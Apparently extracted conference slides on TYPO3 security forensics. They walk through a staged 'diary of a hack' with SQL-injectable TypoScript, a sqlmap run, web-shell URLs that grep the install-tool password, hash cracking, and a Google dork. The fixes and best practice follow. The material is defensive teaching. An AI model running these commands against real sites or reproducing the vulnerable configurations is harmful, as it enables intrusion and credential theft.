Download - Security Forensics - T3DD15
![Page 1: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/1.jpg)
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
TYPO3 Developer Days 2015
Helmut Hummel <[email protected]>
17.07.2015
Securtiy Forensics
1
![Page 2: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/2.jpg)
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
#CertiFUNcation 2015
Agenda• Diary of a Hack
• Pitfalls
• Best Practice
2
![Page 3: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/3.jpg)
Diary of a Hack
3
![Page 4: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/4.jpg)
Diary of a Hack
Day 1 - Implementing a feature
4
![Page 5: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/5.jpg)
Diary of a Hack
5
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where.wrap = colPos=| select.where.data = GP:colPos }
![Page 6: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/6.jpg)
Diary of a Hack
6
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where.wrap = header like '%|%' select.where.data = GP:search }
![Page 7: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/7.jpg)
Diary of a Hack
Day 2 - Testing the feature
7
![Page 8: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/8.jpg)
Diary of a Hack
8
![Page 9: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/9.jpg)
Diary of a Hack
9
'BE/debug' => '1''FE/debug' => '1''SYS/devIPmask' => '*''SYS/displayErrors' => '1''SYS/sqlDebug' => '1''SYS/exceptionalErrors' => '28674'
![Page 10: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/10.jpg)
Diary of a Hack
10
![Page 11: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/11.jpg)
Diary of a Hack
11
'DB/username' => 'root'
![Page 12: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/12.jpg)
Diary of a Hack
12
![Page 13: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/13.jpg)
Diary of a Hack
Day 3 - Distraction
13
![Page 14: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/14.jpg)
Diary of a Hack
14
![Page 15: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/15.jpg)
Diary of a Hack
Day 4 - Attraction
15
![Page 16: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/16.jpg)
Diary of a Hack
16
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
![Page 17: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/17.jpg)
Diary of a Hack
Day 5 - Exploitation
17
![Page 18: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/18.jpg)
Disclaimer
18
![Page 19: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/19.jpg)
Don’t do this at home!
19
![Page 20: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/20.jpg)
Diary of a Hack
20
$ sqlmap -u 'http://security.dev/insecurity/?colPos=0' -p 'colPos'!GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
![Page 21: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/21.jpg)
Diary of a Hack
21
![Page 22: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/22.jpg)
Diary of a Hack
22
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL!http://security.dev/typo3/sysext/install/Start/Install.php!http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
![Page 23: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/23.jpg)
Diary of a Hack
23
$ john pwLoaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])password (dummy)guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing
![Page 24: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/24.jpg)
Diary of a Hack
24
![Page 25: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/25.jpg)
Diary of a Hack
Day 5 - Discovery
25
![Page 26: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/26.jpg)
Diary of a Hack
Discovery• Take site offline!
• seriously
• I mean it
26
![Page 27: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/27.jpg)
27
![Page 28: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/28.jpg)
Diary of a Hack
Day 6 - Analysis
28
![Page 29: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/29.jpg)
Diary of a Hack
Analysis• Make a backup of current state (files, DB)
• Search all logs for „suspicious“ entries
• Try to reproduce assumed entry points
• If in doubt: get help
29
![Page 30: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/30.jpg)
Diary of a Hack
Day 7 - Fix
30
![Page 31: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/31.jpg)
Diary of a Hack
31
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where = colPos=###colPos### select.markers { colPos.data = GP:colPos } }
![Page 32: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/32.jpg)
Diary of a Hack
32
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where = header like ###search### select.markers { search.data = GP:search search.wrap = %|% } }
![Page 33: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/33.jpg)
Diary of a Hack
Fix• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)
33
![Page 35: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/35.jpg)
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Further Pitfalls
35
![Page 36: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/36.jpg)
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics 36
![Page 37: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/37.jpg)
Secure TYPO3
Types of Security Threats• Information disclosure
• SQL injection
• Cross Site Scripting (XSS)
• http://docs.typo3.org/typo3cms/SecurityGuide/TypesOfThreats/Index.html
• https://www.owasp.org/index.php/Category:Attack
37
![Page 38: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/38.jpg)
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
TypoScript
38
![Page 39: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/39.jpg)
page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
39
![Page 40: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/40.jpg)
page.10 = TEXT # title can contain: {DB:be_users:1:password} page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
40
![Page 41: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/41.jpg)
page.10 = TEXT page.10.field = title page.10.wrap = <h1 class="c-{field:layout}">|</h1> page.10.insertData = 1
41
![Page 42: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/42.jpg)
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
42
![Page 43: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/43.jpg)
page.10 = TEXT # title can contain HTML page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1>
43
![Page 44: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/44.jpg)
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
44
![Page 45: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/45.jpg)
page.10 = TEXT page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
45
![Page 46: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/46.jpg)
page.10 = TEXT # Avoid dataWrap or insertData if possible # layout field might not be safe page.10.field = title page.10.dataWrap = <h1 class="c-{field:layout}">|</h1> page.10.htmlSpecialChars = 1
46
![Page 47: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/47.jpg)
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Fluid
47
![Page 48: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/48.jpg)
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Extbase
XSS even when using Fluid• Flash Messages
• HTML Context
• Custom View Helpers
48
![Page 49: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/49.jpg)
Inspiring people toshare
TYPO3 Developer Days 2015
Securtiy Forensics
Best Practice
49
![Page 50: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/50.jpg)
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Best Practice• Defined Process
• Regular updates
• Backups
• Monitoring
• Education
• Reserve time for all of the above
• More in: http://docs.typo3.org/typo3cms/SecurityGuide/
50
![Page 51: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/51.jpg)
Questions?
51
![Page 52: Security Forensics - T3DD15](https://reader033.vdocument.in/reader033/viewer/2022042701/55c99118bb61eb66408b4703/html5/thumbnails/52.jpg)
Inspiring people toshare
#CertiFUNcation - Brühl 2015
Secure TYPO3
Secure TYPO3 - Diary of a Hack
Resources• http://sqlmap.org
• http://www.openwall.com/john/
• http://docs.typo3.org/typo3cms/SecurityGuide/
• https://www.owasp.org/
52